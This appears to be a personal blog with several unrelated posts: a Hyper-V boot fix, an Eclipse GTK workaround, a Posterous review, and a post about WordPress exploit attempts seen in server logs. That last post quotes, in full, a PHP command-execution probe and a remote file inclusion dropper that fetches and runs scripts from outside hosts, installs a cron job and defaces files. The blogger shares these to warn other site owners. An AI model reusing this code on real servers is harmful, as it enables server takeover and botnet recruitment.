On enabling Hyper-V in the “Turn Windows Features On or Off” menu, I was prompted to restart to complete the installation. It rebooted, installed some stuff, then rebooted again. At that point, it got as far as the Windows logo and then nothing – no spinner, no HDD light, no feedback – just the black screen and the Windows logo.

The problem with having your PC break is you’ve lost the simplest way of Googling for a solution, so after much faffing around on my phone, I came across this post – it talks about Windows Server 8, but the common feature was we both have a Gigabyte USB3.0 motherboard… and sure enough, disabling the USB3 controller stopped it hanging on boot.

For anyone that’s interested, I did this by restarting, entering the bios settings screen, then disabling it in there. The exact location of the option will probably depend on your motherboard, but look out for something labelled “USB 3 controller”.

I did have another minor issue after that, whereby it ran Windows diagnostic and asked if I wanted to restore to an earlier point – I said no. Not sure why, if I’m honest. But then it sat with the HDD light flashing manically for about 10 minutes until I turned off the power and booted up again. Everything now seems to be fine!

I don’t know if it’s an incompatibility with the motherboard, or if a patch will come along at some point to fix it, so I’m disabling Hyper-V for now – having 2 USB3 ports is a lot more useful to me right now, especially with a VMWare license to hand and a pretty decent open source alternative available!

Incidently, I did try to install Ubuntu before I uninstalled Hyper-V, and it seemed to work alright – plus the Hyper-V management software looks really useful. Definitely some real potential there. Shame.

Other symptoms included the “Install new software” window not listing any options when I entered an update URL (the options were there, but just not visible – clicking randomly within the selection box seemed to activate/deactivate them). Also the buttons were missing from the search view, so I was no longer able to scroll through the results after a full file search.

Initially, I thought this may have been a Java incompatibility with Karmic – I’d installed the Beta version on the my desktop PC weeks before and experienced the same issue, but assumed it was because the OS wasn’t finished.

But after a bit of digging around, I found a bug logged on the Ubuntu Bug tracker. A post by Holger Berndt seems to confirm the bug is in Eclipse:

Starting from 2.18 on, GTK+ changed some of its internal behaviour (google for “client side windows”). This change is intentional, and needed for other development. It doesn’t make any difference to programs using GTK+ correctly, but it makes problems with programs that use GTK+ in weird ways, making wrong assumptions that only accidentally worked in the past. So, to ease the transition until those programs get fixed, an environment variable has been introduced to simulate the old behaviour.

Reading through the rest of the discussion, it turned out that won’t shouldn’t affect copies of Eclipse checked out from the Ubuntu package repository, but seeing as I was using a copy of PDT I’d got straight from the Eclipse website, I was seeing the problems.

The fix is relatively simple. Create a file in your home folder (or wherever you want) called eclipsefix.sh – open it and add the following lines:

export GDK_NATIVE_WINDOWS=true
/opt/eclipse/eclipse

(where /opt/eclipse/eclipse is the location of your eclipse application file).

Make sure you make it executable (chmod +x ~/eclipsefix.sh) then go to whatever shortcut you usually use to open Eclipse and change the command to point towards the file you just created (ie,/home/mou/eclipsefix.sh).

Now whenever you open Eclipse using this shortcut, the script will run and eclipse should work as expected.

According to the eclipse bug tracker, this issue should be fixed in Eclipse 3.5.2

Update 11/11/09: daYmo has commented that to get it to work he had to use export GDK_NATIVE_WINDOWS=1, so if you have no luck the first time it may be worth giving this a try.

The cool thing is what they do with what you send them. If its a photo, they’ll post it as an image with your text underneath. If its mulitple photos, they post it as a nifty little javascript phot gallery. Video? They encode it and embed it in a video player. Audio? Again, encoded and presented as in an embedded mp3 player. Genius!

Whats the point? Well I got thinking while I was at Glastonbury, uploading all my Twitter photos to Twitpic didn’t feel like they were still mine. I don’t spend any time on my twitpic page, so it feels like you send them the photo, they host it and its gone. OK, so Posterous is still hosted by a company somewhere, but they provide the option to add an A record on your server let people access your posterous site as though it was on your own server. Mine can be found at http://moblog.mou.me.uk and although Posterous still has the content, I still feels like its mine.

They also have integration with other services, such as Twitter and Facebook. Depending on what email address you send your content to, you can get them to post it on any of these services – for example, emailing my photo to twitter@posterous.com will post it on my posterous site, then post a shortened link to the post on my twitter page along with the title – all but eradicating the need to use Twitpic, and keeping my photos with all my other uploaded mobile media content!

I’ll admit I was a little concerned when I saw how simple the email addresses were – for example, posterous@posterous.com will only post it to your posterous, twitter+facebook@posterous.com will post it to your posterous and then to these 2 services, etc. And these email addresses were the same for everyone, which meant that they are looking at the senders address to see if its actually from you or not. My workmate managed to spoof an email from me from his server – which admittedly, had a reverse DNS and domain keys set up (for his domain, not mine) which made it onto the site first time. I all but abandoned the service at this point, until a bit more testing led me to discover that the first email from an email address (after you authorize it to post on your page) was accepted without question, but any further emails are screened to check their origin – when I tried to post an email from my real email address, I received an email asking if it was genuine or not:

** ATTENTION: We noticed you’re sending this from a different computer or location, so it won’t get posted until we’re sure it’s you. Please confirm that you sent this.

Good work, my faith was once again restored. I deleted the email address I’d used originally, added my other primary address and sent a post in – so now if anyone does guess my address, nothing they send should get onto the site without my confirmation.

So Posterous is great and you should start seeing more content springing up on my moblog. As I’ve never been a regular blogger, this is a great excuse to post little items without having to spend 2 hours thinking, proof reading and rewriting!

I’ll be keeping an eye on Techmeme to see what the damage is!

Mind you, unless you know the slightest thing about web design/development or you run a website, you probably won’t get a word of it. For me? Comedy gold

Hat tip to Leanne for the link.

Ha! Should I be proud?? Well sod it, I am anyway

Seriously, I don’t use Askimet – just comment moderation – and if I didn’t know better I’d think the blog spam epidemic was over! (we can all wish)

But the exploits… it always seems to be the same type, all of which (so far) have been stopped by the fact I update my WordPress install regularly. The common trick is using the wp-pass.php vulnerability, which was apparently fixed in wp 2.2.2. Basically, my logs show a 404 from this address like this:

http://mou.me.uk/wp-pass.php/?_wp_http_referer=http://frikyrkja.net/config/exp667.txt?

(We can assume http://frikyrkja.net is probably a compromised server somewhere)

So, of course, I check out this site and take a look what nasty code they’re trying to execute. 9 times out of 10, its looked relatively harmless:

$cmd="id";

$eseguicmd=ex($cmd);

echo $eseguicmd;

function ex($cfe){

$res = '';

if (!empty($cfe)){

if(function_exists('exec')){

@exec($cfe,$res);

$res = join("\n",$res);

}

elseif(function_exists('shell_exec')){

$res = @shell_exec($cfe);

}

elseif(function_exists('system')){

@ob_start();

@system($cfe);

$res = @ob_get_contents();

@ob_end_clean();

}

elseif(function_exists('passthru')){

@ob_start();

@passthru($cfe);

$res = @ob_get_contents();

@ob_end_clean();

}

elseif(@is_resource($f = @popen($cfe,"r"))){

$res = "";

while(!@feof($f)) { $res .= @fread($f,1024); }

@pclose($f);

}}

return $res;

}

This seems like more of a fact finder – testing to see if your server is vulnerable, etc. But today, I came across a particularly bad one:

//exploiter v0.01 for rfi reloader by axe
$safemode=@ini_get('safe_mode');

if (@$_GET['filexp']) {
 if (@$_GET['deface_msg'])
 {
 	$deface_msg = $_GET['deface_msg'];
 }
 else
 {
 	$deface_msg = 'Patched Mother Fucker :p';
 }

 $filexp = $_GET['filexp'];

 $fp = fopen("$filexp","w");
 	if ($fp)
 	{
 		fwrite($fp,$deface_msg);
 		fclose($fp);
 	}
 }

$fp = file_exists('index.php');

if ($fp)
{
}
else
{
passthru('touch index.php');
}

if ($safemode)
{
ini_restore("safe_mode");
ini_restore("open_basedir");

shell_exec('killall -9 perl');
shell_exec('wget http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php');
shell_exec('curl -O http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php');
shell_exec('lwp-download http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php');

shell_exec('fetch http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php;rm -rf popup.txt*');
shell_exec("cd /tmp;echo '*/1 * * * * perl /tmp/.tmp/tmpfile' >cron.job;crontab cron.job;rm -rf cron.job");
shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;wget http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;curl -O http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;lwp-download http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;lynx -source http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;fetch http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;GET http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /dev/shm;wget http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /dev/shm;curl -O http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /dev/shm;lwp-download http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /dev/shm;lynx -source http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /dev/shm;fetch http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /dev/shm;GET http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');

}
else
{

passthru('killall -9 perl');
passthru('wget http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php');

passthru('curl -O http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php');
passthru('lwp-download http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php');
passthru('fetch http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php;rm -rf popup.txt*');
passthru("cd /tmp;echo '*/1 * * * * perl /tmp/.tmp/tmpfile' >cron.job;crontab cron.job;rm -rf cron.job");
passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;wget http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;curl -O http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;lwp-download http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;lynx -source http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;fetch http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;GET http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /dev/shm;wget http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /dev/shm;curl -O http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /dev/shm;lwp-download http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /dev/shm;lynx -source http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /dev/shm;fetch http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /dev/shm;GET http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');

}

I’ll be the first to admit my Unix knowledge leaves a lot to be desired, but from what I can see this looks to be setting up a cron job to run a file 1 minute later before creating a folder and uses every method it can to try to download a text file to your server, which is then executed when the minute is up and the cron job deletes itself. Clever. You can see an example of the text file by clicking here. (Note: Ive added an exit; command top to stop the b*astards using this text file on other people!)

Scary as hell. I havent had a chance to sit down and puzzle out exactly what this script does if you execute it, but I’m willing to bet its not pretty. There seems to be some code to connect to an IRC server, so the point of this is most likely to turn your server into a zombie bot. Or possibly to host exploit scripts for other unpatched WP users to download. I’ll know more when I go through it properly (and hopefully learn a few new things about Unix!!)

The moral of the story? Keep your WordPress up to date! No seriously, go do it now…

If I disappear for 20 minutes sometime in the next 2 days then… well… sorry.